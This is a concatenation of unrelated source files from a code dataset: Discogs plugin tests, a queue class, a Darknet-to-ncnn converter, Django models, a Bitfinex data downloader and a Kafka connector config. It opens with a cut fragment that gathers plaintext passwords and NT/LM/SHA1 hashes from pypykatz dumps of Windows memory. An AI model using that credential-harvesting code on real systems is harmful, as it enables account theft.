for i in ['credman_creds', 'ssp_creds', 'livessp_creds', 'tspkg_creds', 'wdigest_creds']:
for data in user.get(i, []):
if all((data['username'], data['password'])):
login = data['username']
if login not in results:
results[login] = {}
results[login]['Type'] = i
results[login]['Domain'] = data.get('domainname', 'N/A')
results[login]['Password'] = data['password']
# msv_creds to get sha1 user hash
for data in user.get('msv_creds', []):
if data['username']:
login = data['username']
else:
login = user['username']
if login not in results:
results[login] = {}
if data['SHAHash']:
results[login]['Shahash'] = codecs.encode(data['SHAHash'], 'hex')
if data['LMHash']:
results[login]['Lmhash'] = codecs.encode(data['LMHash'], 'hex')
if data['NThash']:
results[login]['Nthash'] = codecs.encode(data['NThash'], 'hex')
constant.pypykatz_result = results
pwd_found = []
for user in results:
results[user]['Login'] = user
pwd_found.append(results[user])
return pwd_found
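# Shape of the list returned by run() above (illustrative values only; the hash
# fields are present only when msv_creds were found for that login):
#   [{'Login': 'jdoe', 'Type': 'wdigest_creds', 'Domain': 'WORKGROUP',
#     'Password': '...', 'Nthash': b'...', 'Shahash': b'...'}]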
| 2.09375 | 2 |
test/test_discogs.py | mglukhovsky/beets | 0 | 1154 | <filename>test/test_discogs.py
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for discogs plugin.
"""
from __future__ import division, absolute_import, print_function
import unittest
from test import _common
from test._common import Bag
from test.helper import capture_log
from beetsplug.discogs import DiscogsPlugin
class DGAlbumInfoTest(_common.TestCase):
def _make_release(self, tracks=None):
"""Returns a Bag that mimics a discogs_client.Release. The list
of elements on the returned Bag is incomplete, including just
those required for the tests on this class."""
data = {
'id': 'ALBUM ID',
'uri': 'ALBUM URI',
'title': 'ALBUM TITLE',
'year': '3001',
'artists': [{
'name': 'ARTIST NAME',
'id': 'ARTIST ID',
'join': ','
}],
'formats': [{
'descriptions': ['FORMAT DESC 1', 'FORMAT DESC 2'],
'name': 'FORMAT',
'qty': 1
}],
'styles': [
'STYLE1', 'STYLE2'
],
'labels': [{
'name': 'LABEL NAME',
'catno': 'CATALOG NUMBER',
}],
'tracklist': []
}
if tracks:
for recording in tracks:
data['tracklist'].append(recording)
return Bag(data=data,
# Make some fields available as properties, as they are
# accessed by DiscogsPlugin methods.
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
def _make_track(self, title, position='', duration='', type_=None):
track = {
'title': title,
'position': position,
'duration': duration
}
if type_ is not None:
# Test samples on discogs_client do not have a 'type_' field, but
# the API seems to return it. Values: 'track' for regular tracks,
# 'heading' for descriptive texts (ie. not real tracks - 12.13.2).
track['type_'] = type_
return track
def _make_release_from_positions(self, positions):
"""Return a Bag that mimics a discogs_client.Release with a
tracklist where tracks have the specified `positions`."""
tracks = [self._make_track('TITLE%s' % i, position) for
(i, position) in enumerate(positions, start=1)]
return self._make_release(tracks)
def test_parse_media_for_tracks(self):
tracks = [self._make_track('TITLE ONE', '1', '01:01'),
self._make_track('TITLE TWO', '2', '02:02')]
release = self._make_release(tracks=tracks)
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.media, 'FORMAT')
self.assertEqual(t[0].media, d.media)
self.assertEqual(t[1].media, d.media)
def test_parse_medium_numbers_single_medium(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 1)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[0].medium_total, 2)
def test_parse_medium_numbers_two_mediums(self):
release = self._make_release_from_positions(['1-1', '2-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 1)
self.assertEqual(t[1].medium, 2)
self.assertEqual(t[1].medium_total, 1)
def test_parse_medium_numbers_two_mediums_two_sided(self):
release = self._make_release_from_positions(['A1', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[2].medium, 2)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[2].medium_index, 1)
def test_parse_track_indices(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
def test_parse_track_indices_several_media(self):
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 3)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[2].medium_index, 1)
self.assertEqual(t[2].index, 3)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[3].medium_index, 1)
self.assertEqual(t[3].index, 4)
self.assertEqual(t[3].medium_total, 1)
def test_parse_position(self):
"""Test the conversion of discogs `position` to medium, medium_index
and subtrack_index."""
# List of tuples (discogs_position, (medium, medium_index, subindex)
positions = [('1', (None, '1', None)),
('A12', ('A', '12', None)),
('12-34', ('12-', '34', None)),
('CD1-1', ('CD1-', '1', None)),
('1.12', (None, '1', '12')),
('12.a', (None, '12', 'A')),
('12.34', (None, '12', '34')),
('1ab', (None, '1', 'AB')),
# Non-standard
('IV', ('IV', None, None)),
]
d = DiscogsPlugin()
for position, expected in positions:
self.assertEqual(d.get_track_index(position), expected)
def test_parse_tracklist_without_sides(self):
"""Test standard Discogs position 12.2.9#1: "without sides"."""
release = self._make_release_from_positions(['1', '2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_with_sides(self):
"""Test standard Discogs position 12.2.9#2: "with sides"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'B2'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1) # 2 sides = 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_lp(self):
"""Test standard Discogs position 12.2.9#3: "multiple LP"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2) # 3 sides = 1 LP + 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_cd(self):
"""Test standard Discogs position 12.2.9#4: "multiple CDs"."""
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 3)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_non_standard(self):
"""Test non standard Discogs position."""
release = self._make_release_from_positions(['I', 'II', 'III', 'IV'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_subtracks_dot(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, dots"."""
release = self._make_release_from_positions(['1', '2.1', '2.2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.1', 'A2.2',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_letter(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, letter"."""
release = self._make_release_from_positions(['A1', 'A2a', 'A2b', 'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.a', 'A2.b',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_extra_material(self):
"""Test standard Discogs position 12.2.9#6: "extra material"."""
release = self._make_release_from_positions(['1', '2', 'Video 1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_indices(self):
"""Test parsing of subtracks that include index tracks."""
release = self._make_release_from_positions(['', '', '1.1', '1.2'])
# Track 1: Index track with medium title
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE'
# Track 2: Index track with track group title
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE')
self.assertEqual(len(d.tracks), 1)
self.assertEqual(d.tracks[0].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_logical(self):
"""Test parsing of subtracks defined inside a index track that are
logical subtracks (ie. should be grouped together into a single track).
"""
release = self._make_release_from_positions(['1', '', '3'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2.1', '01:01'),
self._make_track('TITLE TWO', '2.2', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
self.assertEqual(d.tracks[1].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_physical(self):
"""Test parsing of subtracks defined inside a index track that are
physical subtracks (ie. should not be grouped together).
"""
release = self._make_release_from_positions(['1', '', '4'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2', '01:01'),
self._make_track('TITLE TWO', '3', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
self.assertEqual(d.tracks[1].title, 'TITLE ONE')
self.assertEqual(d.tracks[2].title, 'TITLE TWO')
def test_parse_tracklist_disctitles(self):
"""Test parsing of index tracks that act as disc titles."""
release = self._make_release_from_positions(['', '1-1', '1-2', '',
'2-1'])
# Track 1: Index track with medium title (Cd1)
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE CD1'
# Track 4: Index track with medium title (Cd2)
release.data['tracklist'][3]['title'] = 'MEDIUM TITLE CD2'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[1].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[2].disctitle, 'MEDIUM TITLE CD2')
self.assertEqual(len(d.tracks), 3)
def test_parse_minimal_release(self):
"""Test parsing of a release with the minimal amount of information."""
data = {'id': 123,
'tracklist': [self._make_track('A', '1', '01:01')],
'artists': [{'name': 'ARTIST NAME', 'id': 321, 'join': ''}],
'title': 'TITLE'}
release = Bag(data=data,
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.artist, 'ARTIST NAME')
self.assertEqual(d.album, 'TITLE')
self.assertEqual(len(d.tracks), 1)
def test_parse_release_without_required_fields(self):
"""Test parsing of a release that does not have the required fields."""
release = Bag(data={}, refresh=lambda *args: None)
with capture_log() as logs:
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d, None)
self.assertIn('Release does not contain the required fields', logs[0])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 2.359375 | 2 |
data_structures/queue/queue_on_pseudo_stack.py | hank-chou/python | 13 | 1155 | <filename>data_structures/queue/queue_on_pseudo_stack.py
"""Queue represented by a pseudo stack (represented by a list with pop and append)"""
class Queue:
def __init__(self):
self.stack = []
self.length = 0
def __str__(self):
printed = "<" + str(self.stack)[1:-1] + ">"
return printed
"""Enqueues {@code item}
@param item
item to enqueue"""
def put(self, item):
self.stack.append(item)
self.length = self.length + 1
"""Dequeues {@code item}
@requirement: |self.length| > 0
@return dequeued
item that was dequeued"""
def get(self):
self.rotate(1)
dequeued = self.stack[self.length - 1]
self.stack = self.stack[:-1]
self.rotate(self.length - 1)
self.length = self.length - 1
return dequeued
"""Rotates the queue {@code rotation} times
@param rotation
number of times to rotate queue"""
def rotate(self, rotation):
for i in range(rotation):
temp = self.stack[0]
self.stack = self.stack[1:]
self.put(temp)
self.length = self.length - 1
"""Reports item at the front of self
@return item at front of self.stack"""
def front(self):
front = self.get()
self.put(front)
self.rotate(self.length - 1)
return front
"""Returns the length of this.stack"""
def size(self):
return self.length
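# Illustrative self-test (added sketch, not part of the original module):
# demonstrates the FIFO behaviour of the pseudo-stack queue defined above.
if __name__ == "__main__":
    queue = Queue()
    for item in [1, 2, 3]:
        queue.put(item)
    print(queue)          # <1, 2, 3>
    print(queue.front())  # 1 (peek keeps the queue intact)
    print(queue.get())    # 1 (dequeued)
    print(queue.size())   # 2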
| 4.1875 | 4 |
darknet2ncnn.py | nihui/gen-ncnn-models | 4 | 1156 | <reponame>nihui/gen-ncnn-models
#! /usr/bin/env python
# coding: utf-8
import configparser
import numpy as np
import re,sys,os
from graph import MyGraph
from collections import OrderedDict
def unique_config_sections(config_file):
"""Convert all config sections to have unique names.
Adds unique suffixes to config sections for compability with configparser.
"""
from collections import defaultdict
import io
section_counters = defaultdict(int)
output_stream = io.StringIO()
with open(config_file) as fin:
for line in fin:
if line.startswith('['):
section = line.strip().strip('[]')
_section = section + '_' + str(section_counters[section])
section_counters[section] += 1
line = line.replace(section, _section)
output_stream.write(line)
output_stream.seek(0)
return output_stream
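# Example of the renaming performed above (illustrative): a Darknet cfg with two
# `[convolutional]` sections is rewritten as `[convolutional_0]` and
# `[convolutional_1]` so that configparser accepts the duplicate section names.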
def getFilters(mydict, name):
#print('find filters for ', name)
if hasattr(mydict[name], 'filters'):
return mydict[name].filters
else:
assert len(mydict[name].input) >= 1
return getFilters(mydict, mydict[name].input[0])
def readfile(f, len, msg):
print(" %s read %d bytes" % (msg, len))
return f.read(len)
def buildGraph(config_path, weights_path):
unique_config_file = unique_config_sections(config_path)
cfg_parser = configparser.ConfigParser()
cfg_parser.read_file(unique_config_file)
weights_file = open(weights_path, 'rb')
# read out major, minor, revision, net.seen
readfile(weights_file, (4*4), 'head')
mydict = OrderedDict()
# record the output of the original layer
mylist = []
count = 4
import queue
for _section in cfg_parser.sections():
sec_q = queue.Queue(0)
sec_q.put(cfg_parser[_section])
while not sec_q.empty():
sec = sec_q.get()
section = sec.name
print('Parsing section {}'.format(section))
# this section will can be a subsection
if section.startswith('activation') or section.endswith('activation'):
activation = sec.get('activation', fallback = 'logistic')
if activation == 'linear':
pass
elif activation == 'linear' or activation == 'leaky' or activation == 'relu':
node = MyGraph.MyNode()
node.name = section
node.op = 'Leaky'
if activation == 'linear':
node.slope = 1
elif activation == 'leaky':
node.slope = 0.1
elif activation == 'relu':
node.slope = 0
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
mydict[node.name] = node
prev_output = node.name
# prev_layer_filters no change
else:
raise ValueError(
'Unknown activation function `{}` in section {}'.format(
activation, section))
if section.startswith('activation'):
mylist.append(section)
elif re.match(r'^(convolutional|depthwise|groupwise)_\d+$', section):
if section.startswith('convolutional'):
conv = 'conv'
filters = sec.getint('filters', fallback = 1)
groups = 1
op = 'Conv2D'
elif section.startswith('depthwise'):
conv = 'dconv'
filters = prev_layer_filters
multiplier = sec.getint('multiplier', fallback = 1)
assert multiplier == 1
groups = filters
op = 'DepthwiseConv2dNative'
elif section.startswith('groupwise'):
conv = 'gconv'
filters = sec.getint('filters', fallback=1)
groups = sec.getint('groups', fallback = 1)
op = 'DepthwiseConv2dNative'
size = sec.getint('size', fallback = 1)
stride = sec.getint('stride', fallback = 1)
pad = sec.getint('pad', fallback = 0)
padding = sec.getint('padding', fallback = 0)
activation = sec.get('activation', fallback = 'logistic')
batch_normalize = sec.getint('batch_normalize', 0)
# padding='same' is equivalent to Darknet pad=1
# padding = 'same' if pad == 1 else 'valid'
if pad:
padding = size//2
# Setting weights.
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
#prev_layer_shape = prev_layer.shape
# TODO: This assumes channel last dim_ordering.
if conv == 'conv':
weights_shape = (size, size, prev_layer_filters, filters)
idx_tf2darknet = [0, 1, 2, 3]
elif conv == 'dconv':
weights_shape = (size, size, filters)
idx_tf2darknet = [0, 1, 2]
elif conv == 'gconv':
weights_shape = (size, size, prev_layer_filters//groups, filters//groups, groups)
idx_tf2darknet = [0, 1, 2, 3, 4]
idxmap = {x: i for i, x in enumerate(idx_tf2darknet)}
idx_dartnet2tf = [idxmap[i] for i in range(len(idxmap))]
weights_size = np.product(weights_shape)
print(' ' + conv, 'bn' if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters, ),
dtype=np.float32,
buffer=readfile(weights_file, (filters * 4), section+'-bias'))
count += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype=np.float32,
buffer=readfile(weights_file, (filters * 12), section+'-batchnorm'))
count += 3 * filters
# TODO: Keras BatchNormalization mistakenly refers to var
# as std.
bn_weight_list = [
bn_weights[0], # scale gamma
conv_bias, # shift beta
bn_weights[1], # running mean
bn_weights[2] # running var
]
conv_weights = np.ndarray(
shape=[weights_shape[i] for i in idx_tf2darknet],
dtype=np.float32,
buffer=readfile(weights_file, (weights_size * 4), section+'-weights'))
count += weights_size
# DarkNet conv_weights are serialized Caffe-style:
# (out_dim, in_dim, height, width)
# We would like to set these to Tensorflow order:
# (height, width, in_dim, out_dim)
# TODO: Add check for Theano dim ordering.
#print("the darknet shape is ", conv_weights.shape)
conv_weights = np.transpose(conv_weights, idx_dartnet2tf)
#print("the tf shape is ", conv_weights.shape)
conv_weights = [conv_weights] if batch_normalize else [
conv_weights, conv_bias
]
# Create nodes
#conv_layer = np.zeros([1, 1, filters], dtype = np.float32)
node = MyGraph.MyNode()
node.name = section
node.op = op
node.input = [prev_output]
node.input_norm = node.input
node.kernel = conv_weights[0]
node.padding = padding
node.strides = [1,stride,stride,1]
node.groups = groups
node.filters = filters
mydict[node.name] = node
prev_output = node.name
prev_layer_filters = filters
if batch_normalize:
node = MyGraph.MyNode()
node.name = section + '_batch_normalize'
node.op = 'FusedBatchNorm'
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
node.gamma = bn_weights[0]
node.beta = conv_bias
node.mean = bn_weights[1]
node.variance = bn_weights[2]
mydict[node.name] = node
prev_output = node.name
# prev_layer_filters no change
else:
node = MyGraph.MyNode()
node.name = section + '_bias'
node.op = 'BiasAdd'
node.input = [prev_output]
node.input_norm = node.input
#node.attr = []
node.bias = conv_bias
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
mylist.append(name)
elif section.startswith('shuffle'):
node = MyGraph.MyNode()
node.name = section
node.op = 'Shuffle'
node.input = [prev_output]
node.input_norm = node.input
node.groups = int(cfg_parser[section]['groups'])
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
elif re.match(r'^(pooling|maxpool|avgpool)_\d+$', section):
node = MyGraph.MyNode()
node.stride = sec.getint('stride', fallback = 1)
node.size = sec.getint('size', node.stride)
node.padding = sec.getint('padding', fallback = (node.size-1)//2)
if section.startswith('pooling'):
node.mode = str(cfg_parser[section]['mode'])
node.global_pooling = 0
elif section.startswith('maxpool'):
node.mode = 'max'
node.global_pooling = 0
elif section.startswith('avgpool'):
node.mode = 'avg'
node.global_pooling = 1
node.name = section
node.op = 'Pooling'
node.input = [prev_output]
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
#print('pooling ', vars(node))
mylist.append(section)
elif section.startswith('route'):
ids = [int(i) for i in cfg_parser[section]['layers'].split(',')]
node = MyGraph.MyNode()
node.name = section
node.op = 'NCNNConcat'
node.input = [mylist[i] for i in ids]
#print('mylist is ', mylist, 'the ids is ', ids, 'node input is ', node.input)
node.input_norm = node.input
node.axis = 0
node.filters = sum([getFilters(mydict, mylist[i]) for i in ids])
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
prev_layer_filters = node.filters
elif section.startswith('reorg'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetReorg'
node.input = [prev_output]
node.stride = sec.getint('stride', fallback = 1)
node.input_norm = node.input
node.filters = getFilters(mydict, node.input[0]) * node.stride * node.stride
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
prev_layer_filters = node.filters
elif re.match(r'^(shortcut)_\d+$', section):
activation = sec.get('activation', fallback = 'logistic')
from_ = sec.getint('from')
node = MyGraph.MyNode()
node.name = section
node.op = 'BinaryOp'
node.op_type = 0
node.input = [prev_output, mylist[from_]]
#print('mylist is ', mylist, 'the from_ is ', from_, 'node input is ', node.input)
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
# NOTE: this section has relative reference
mylist.append(name)
elif section.startswith('connected'):
activation = sec.get('activation', fallback='linear')
filters = sec.getint('output', 2)
bias_data = np.ndarray(
shape=[filters],
dtype=np.float32,
buffer=readfile(weights_file, (filters * 4), section+'-bias'))
fc_data = np.ndarray(
shape=[prev_layer_filters, filters],
dtype=np.float32,
buffer=readfile(weights_file, (prev_layer_filters * filters * 4), section+'-weight'))
node = MyGraph.MyNode()
node.name = section
node.op = 'MatMul'
node.input = [prev_output]
node.input_norm = node.input
node.multiplier = fc_data
mydict[node.name] = node
prev_output = node.name
prev_layer_filters = filters
node = MyGraph.MyNode()
node.name = section + '_bias'
node.op = 'BiasAdd'
node.input = [prev_output]
node.input_norm = node.input
# node.attr = []
node.bias = bias_data
mydict[node.name] = node
prev_output = node.name
if activation == 'linear':
mylist.append(prev_output)
else:
tmp_parser = configparser.ConfigParser()
name = section + '_activation'
tmp_parser.add_section(name)
tmp_parser.set(name, 'activation', activation)
sec_q.put(tmp_parser[name])
mylist.append(name)
elif section.startswith('net'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetNet'
node.input = []
node.input_norm = []
node.width = int(cfg_parser['net_0']['width'])
node.height = int(cfg_parser['net_0']['height'])
node.channels = int(cfg_parser['net_0']['channels'])
node.filters = node.channels
# print(vars(node))
# node.attr = []
mydict[node.name] = node
# start here
prev_output = node.name
prev_layer_filters = node.channels
mylist.append(section)
elif section.startswith('region'):
node = MyGraph.MyNode()
node.name = section
node.op = 'DarknetRegion'
node.input = [prev_output]
node.input_norm = node.input
node.classes = int(cfg_parser[section]['classes'])
node.num = int(cfg_parser[section]['num'])
node.softmax = int(cfg_parser[section]['softmax'])
node.anchors = [float(i) for i in re.split(r',', cfg_parser[section]['anchors'])]
#print(vars(node))
#node.attr = []
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
elif section.startswith('softmax'):
node = MyGraph.MyNode()
node.name = section
node.op = 'Softmax'
node.input = [prev_output]
node.input_norm = node.input
mydict[node.name] = node
prev_output = node.name
mylist.append(section)
pass
elif section.startswith('cost'):
pass # Configs not currently handled during model definition.
else:
raise ValueError(
'Unsupported section header type: {}'.format(section))
print(' out filters ', prev_layer_filters)
print('loaded {} bytes in weights file'.format(count*4))
mygraph = MyGraph(mydict)
mygraph.type = 'darknet'
return mygraph
if __name__ == '__main__':
config_path = sys.argv[1]
weights_path = sys.argv[2]
mygraph = buildGraph(config_path, weights_path)
    # Define the output nodes, input nodes and stop nodes needed for the subgraph
outputNodes = ['region_0', 'softmax_0']
stopNodes = []
inputNodes = ['darknet_0']
mygraph.extractSubGraph(inputNodes, outputNodes, stopNodes)
mygraph.generateDot('YoloV2.dot')
    # Generate the code corresponding to the subgraph
mygraph.generateSource('YoloV2', os.path.split(config_path)[1]+'.ncnn', os.path.split(weights_path)[1] + '.ncnn')
| 2.453125 | 2 |
music/models.py | anirudha-bs/Django_music_app | 0 | 1157 | from django.contrib.auth.models import Permission, User
from django.db import models
class Album(models.Model):
user = models.ForeignKey(User, default=1,on_delete=models.CASCADE)
artist = models.CharField(max_length=250)
album_title = models.CharField(max_length=500)
genre = models.CharField(max_length=100)
album_logo = models.FileField(default="avatar.jpg")
album_visibility = models.CharField(max_length=100, default="private")
is_favorite = models.BooleanField(default=False)
def __str__(self):
return self.album_title + '-' + self.artist + '-' + self.genre
class Song(models.Model):
user = models.ForeignKey(User, default=1,on_delete=models.CASCADE)
album = models.ForeignKey(Album, on_delete=models.CASCADE, null=True)
song_title = models.CharField(max_length=250)
audio_file = models.FileField(default='')
song_visibility = models.CharField(max_length=100, default="private")
is_favorite = models.BooleanField(default=False)
def __str__(self):
return self.song_title | 2.515625 | 3 |
finex_history.py | yihming/gdax-data | 0 | 1158 | <filename>finex_history.py
import datetime
import calendar
import requests
import pandas as pd
import json
import os.path
import time
import MySQLdb as M
from gdax_history import timestamp_to_utcstr
def connect_to_db():
config = json.load(open('dbconn.json'))["mysql"]
db = M.connect(host = config["host"],
user = config["user"],
passwd = config["password"],
db = config["database"])
return db
def write_to_db(df, db):
print "Write %d entries to database." % df.shape[0]
cur = db.cursor()
try:
for row in df.itertuples():
ts = row.Time / 1000
cur.execute(
"""INSERT INTO finex_history (timestamp, open, close, high, low, volume, utc_datetime)
VALUES (%s, %s, %s, %s, %s, %s, %s)""",
[ts, row.Open, row.Close, row.High, row.Low, row.Volume, timestamp_to_utcstr(ts)])
db.commit()
print "Write successfully!\n"
except (M.Error, M.Warning) as e:
print e
db.rollback()
def collect_data(start, end):
starttime = datetime.datetime.strptime(start, '%m/%d/%Y')
endtime = datetime.datetime.strptime(end, '%m/%d/%Y')
start_unixtime = calendar.timegm(starttime.utctimetuple())
end_unixtime = calendar.timegm(endtime.utctimetuple())
    track_time = time.time()  # the exchange API rate-limits requests (this script stays under 10 per minute), so rest if we are faster than that
count = 0
df = pd.DataFrame(data = [], columns = ['Time', 'Open', 'Close', 'High', 'Low', 'Volume'])
while (start_unixtime < end_unixtime):
        cur_end_unixtime = start_unixtime + 60 * 999  # 999 one-minute candles per request (the URL asks for at most 1000)
if (cur_end_unixtime > end_unixtime):
cur_end_unixtime = end_unixtime #if the time is in future.
        url = 'https://api.bitfinex.com/v2/candles/trade:1m:tBTCUSD/hist?start={}&end={}&limit=1000'.format(str(start_unixtime) + "000", str(cur_end_unixtime) + "000")  # 1m candles; the timeframe token in the URL can be changed
response = requests.get(url)
data = response.json()
df_tmp = pd.DataFrame(data)
df_tmp.columns = ['Time', 'Open', 'Close', 'High', 'Low', 'Volume']
#df.set_index('Time')
df = pd.concat([df, df_tmp])
start_unixtime = cur_end_unixtime + 60 #to prevent duplicates
count = count + 1
if (count == 10): #if 10 requests are made
count = 0 #reset it
diff = time.time() - track_time
if (diff <= 60):
print('Sleeping for {} seconds'.format(str(60 - diff)))
time.sleep(60 - diff) #sleep
track_time = time.time()
            # stay under 10 requests per minute to respect the exchange API rate limit
df = df.sort_values(by = ['Time'])
return df
def main():
db = connect_to_db()
df = collect_data(start = '09/24/2018', end = '09/26/2018')
write_to_db(df, db)
db.close()
if __name__ == "__main__":
main()
| 2.578125 | 3 |
src/producers/connector.py | cvelas31/public_transportation_streaming | 0 | 1159 | """Configures a Kafka Connector for Postgres Station data"""
import json
import logging
import requests
from settings import Settings
logger = logging.getLogger(__name__)
KAFKA_CONNECT_URL = f"{Settings.URLs.KAFKA_CONNECT_URL}/connectors"
CONNECTOR_NAME = "stations"
def configure_connector():
"""Starts and configures the Kafka Connect connector"""
logging.debug("Creating or updating kafka connect connector...")
resp = requests.get(f"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}")
if resp.status_code == 200:
logging.debug("Connector already created skipping recreation")
return
config = {
"connector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",
"key.converter": "org.apache.kafka.connect.json.JsonConverter",
"key.converter.schemas.enable": "false",
"value.converter": "org.apache.kafka.connect.json.JsonConverter",
"value.converter.schemas.enable": "false",
"topic.prefix": "com.connect.transportation.",
"connection.url": "jdbc:postgresql://postgres:5432/cta",
"connection.user": "cta_admin",
"connection.password": "<PASSWORD>",
"batch.max.rows": "500",
"table.whitelist": "stations",
"poll.interval.ms": "5000", # Poll every 5 seconds
"mode": "incrementing",
"incrementing.column.name": "stop_id",
}
# TODO: Complete the Kafka Connect Config below.
# Directions: Use the JDBC Source Connector to connect to Postgres. Load the `stations` table
# using incrementing mode, with `stop_id` as the incrementing column name.
# Make sure to think about what an appropriate topic prefix would be, and how frequently Kafka
